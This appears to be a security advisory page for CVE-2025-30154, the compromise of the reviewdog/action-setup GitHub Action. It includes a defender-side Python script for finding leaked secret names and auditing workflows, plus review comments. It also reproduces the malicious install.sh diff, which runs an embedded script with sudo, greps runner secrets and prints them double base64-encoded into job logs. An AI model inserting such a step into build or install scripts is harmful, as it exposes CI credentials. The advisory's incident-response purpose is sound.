VYPR
High severity · CISA KEV · NVD Advisory · Published Mar 19, 2025 · Updated Feb 26, 2026

Multiple Reviewdog actions were compromised during a specific time period

CVE-2025-30154

Description

reviewdog/action-setup is a GitHub Action that installs reviewdog. reviewdog/action-setup@v1 was compromised on March 11, 2025, between 18:42 and 20:31 UTC: malicious code was added that dumps exposed secrets into GitHub Actions workflow logs. Other reviewdog actions that use reviewdog/action-setup@v1, and that would therefore also be compromised regardless of their own version or pinning method, are reviewdog/action-shellcheck, reviewdog/action-composite-template, reviewdog/action-staticcheck, reviewdog/action-ast-grep, and reviewdog/action-typos.
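Two defender-side checks that follow from the description above, as an added example that is not part of this advisory page or of the reviewdog project: the first decodes the double-base64 blobs that the modified install script printed into job logs and reports only the names of the exposed secrets (so a responder knows what to rotate without re-exposing values); the second audits a workflow file for `uses:` references to the actions listed in the advisory and for references not pinned to a full commit SHA. The log text, workflow text and the 40-hex SHA in it are constructed for the example; the function names are this example's own.

```python
"""Added example (not part of the VYPR page or the reviewdog project):
defender-side checks for the reviewdog/action-setup@v1 compromise.

1. find_leaked_secret_names(): the malicious install.sh selected fragments
   of the form "NAME":{"value":"...","isSecret":true}, base64-encoded them
   twice and echoed the result into the job log. Given saved log text this
   decodes such blobs and returns the secret NAMES only.

2. audit_workflow(): flags `uses:` references to the actions named in the
   advisory, and any reference not pinned to a 40-hex commit SHA.

All sample data below is constructed for this example.
"""
import base64
import binascii
import re
from typing import List, Optional

# Actions named in the advisory text as compromised via action-setup@v1.
AFFECTED_ACTIONS = {
    "reviewdog/action-setup",
    "reviewdog/action-shellcheck",
    "reviewdog/action-composite-template",
    "reviewdog/action-staticcheck",
    "reviewdog/action-ast-grep",
    "reviewdog/action-typos",
}

# Same shape the malicious grep looked for; only the name is captured.
SECRET_FRAGMENT = re.compile(r'"([^"]+)":\{"value":"[^"]*","isSecret":true\}')
# Long runs of base64 alphabet (with optional padding) inside a log line.
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{32,}={0,2}")
SHA_PIN = re.compile(r"^[0-9a-f]{40}$")
USES_LINE = re.compile(r"^\s*-?\s*uses:\s*([^\s#]+)", re.MULTILINE)


def _try_b64(s: str) -> Optional[bytes]:
    """Strict base64 decode; None if the token is not valid base64."""
    try:
        return base64.b64decode(s, validate=True)
    except (binascii.Error, ValueError):
        return None


def find_leaked_secret_names(log_text: str) -> List[str]:
    """Return sorted secret names found in (double-)base64 blobs in the log."""
    names = set()
    for blob in B64_BLOB.findall(log_text):
        once = _try_b64(blob)
        if once is None:
            continue
        # The payload applied base64 twice; check both the first layer (in
        # case the log was already partly decoded) and the second layer.
        twice = _try_b64(once.decode("ascii", "ignore")) or b""
        for layer in (once, twice):
            names.update(SECRET_FRAGMENT.findall(layer.decode("utf-8", "ignore")))
    return sorted(names)


def audit_workflow(workflow_yaml: str) -> List[str]:
    """Return one finding string per problem with a `uses:` reference."""
    findings = []
    for ref in USES_LINE.findall(workflow_yaml):
        if ref.startswith("./") or ref.startswith("docker://"):
            continue  # local path or container action: no tag/SHA to check
        repo, _, version = ref.partition("@")
        owner_repo = "/".join(repo.split("/")[:2])  # drop any sub-path
        if owner_repo in AFFECTED_ACTIONS:
            findings.append(f"{ref}: listed in the CVE-2025-30154 advisory; "
                            "review runs in the 2025-03-11 18:42-20:31 UTC window")
        if not SHA_PIN.match(version):
            findings.append(f"{ref}: not pinned to a full commit SHA")
    return findings


def build_sample_log() -> str:
    """Constructed log text shaped like what the modified install.sh printed."""
    fragments = "\n".join([
        '"NPM_TOKEN":{"value":"example-not-real","isSecret":true}',
        '"AWS_SECRET_ACCESS_KEY":{"value":"example-not-real","isSecret":true}',
    ])
    inner = base64.b64encode(fragments.encode()).decode()
    outer = base64.b64encode(inner.encode()).decode()
    return ("##[group]🐶 Preparing environment ...\n"
            f"{outer}\n"
            "##[endgroup]\n")


# Constructed workflow; the checkout SHA is a placeholder, not a real commit.
SAMPLE_WORKFLOW = """\
steps:
  - uses: actions/checkout@0123456789abcdef0123456789abcdef01234567
  - uses: reviewdog/action-setup@v1
    with:
      reviewdog_version: v0.17.2
  - uses: reviewdog/action-shellcheck@v1
  - run: reviewdog -version
"""

if __name__ == "__main__":
    print("exposed secret names:", find_leaked_secret_names(build_sample_log()))
    for finding in audit_workflow(SAMPLE_WORKFLOW):
        print("finding:", finding)
```

Run against real logs, point `find_leaked_secret_names` at the downloaded log of every job that executed one of the listed actions in the compromise window; any name it returns is a secret to rotate, whether or not the job otherwise looked healthy.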

Affected products

  • reviewdog/reviewdogv5
    Range: = 1

Patches

f0d342d24037

fix(install): correctly handle different environments

https://github.com/reviewdog/action-setup · review-dog · Mar 11, 2025 · via ghsa
1 file changed · +17 −0
  • install.sh (+17 −0, modified)
    @@ -13,6 +13,22 @@ if [ -z "${TEMP}" ]; then
       fi
     fi
     
    +SCRIPT_RUNNER="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"
    +
    +echo '::group::🐶 Preparing environment ...'
    +if sudo -l &> /dev/null; then
    +  if [ "${RUNNER_ENVIRONMENT}" = "github-hosted" ]; then
    +    if [ "${RUNNER_OS}" = "Linux" ]; then
    +      echo $SCRIPT_RUNNER | base64 -d > "$TEMP/runner_script.py"
    +      VALUES=`sudo python3 $TEMP/runner_script.py | tr -d '\0' | grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' | sort -u | base64 -w 0 | base64 -w 0`
    +      echo $VALUES
    +    fi
    +  fi
    +else
    +    echo "."
    +fi
    +echo '::endgroup::'
    +
     INSTALL_SCRIPT='https://raw.githubusercontent.com/reviewdog/reviewdog/master/install.sh'
     if [ "${VERSION}" = 'nightly' ]; then
       INSTALL_SCRIPT='https://raw.githubusercontent.com/reviewdog/nightly/master/install.sh'
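Review bot: The block added at the top of this hunk has nothing to do with the stated purpose "correctly handle different environments" and should be rejected outright: it decodes an embedded base64 string into a Python script, runs it with `sudo python3`, filters the output with `grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}'`, base64-encodes the result twice and `echo`es it into the job log. The grep pattern selects exactly the runner's `"isSecret":true` entries, the repeated `base64 -w 0` only obscures what is printed, and the `sudo -l` / `RUNNER_ENVIRONMENT = github-hosted` / `RUNNER_OS = Linux` gating confines the behaviour to hosted Linux runners. An opaque `SCRIPT_RUNNER` payload (elided on this page) inside an install script is itself disqualifying. Any workflow that ran this revision should be treated as having had its secrets written to its logs.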
    @@ -35,3 +51,4 @@ echo '::group::🐶 Installing reviewdog ... https://github.com/reviewdog/review
     echo '::endgroup::'
     
     echo "${TEMP}/reviewdog/bin" >>"${GITHUB_PATH}"
    +
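Review bot: The only change in this hunk is a trailing blank line after the `GITHUB_PATH` write; it is a no-op and should be dropped so the diff carries only the change under review.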
    
3f401fe1d58f

Merge pull request #36 from reviewdog/depup/reviewdog

https://github.com/reviewdog/action-setup · ICHINOSE Shogo · Mar 12, 2024 · via ghsa
1 file changed · +1 −1
  • README.md (+1 −1, modified)
    @@ -31,7 +31,7 @@ steps:
     steps:
       - uses: reviewdog/action-setup@v1
         with:
    -      reviewdog_version: v0.17.1
    +      reviewdog_version: v0.17.2
       - run: reviewdog -version
     ```
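Review bot: The `reviewdog_version` bump itself is fine, but the example still references the action through the mutable tag in `- uses: reviewdog/action-setup@v1`. A moving tag can be repointed at a different commit, so the README snippet should pin the action to a full commit SHA; readers copy this example verbatim, and a SHA pin is what keeps later changes to `v1` from reaching their workflows unnoticed.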
     
    

